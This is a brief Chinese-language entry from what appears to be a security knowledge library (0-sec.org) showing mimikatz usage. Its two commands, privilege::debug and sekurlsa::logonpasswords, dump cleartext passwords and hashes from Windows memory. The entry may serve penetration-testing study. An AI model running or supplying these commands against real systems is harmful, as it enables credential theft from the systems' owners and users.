4.1.1 mimikatz

用法:

mimikatz # privilege::debug (提升权限)
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords (抓取明文密码和 hash)

image

零组资料文库 all right reserved,powered by 0-sec.org未经授权禁止转载 2019-12-24 17:19:22

results matching ""

    No results matching ""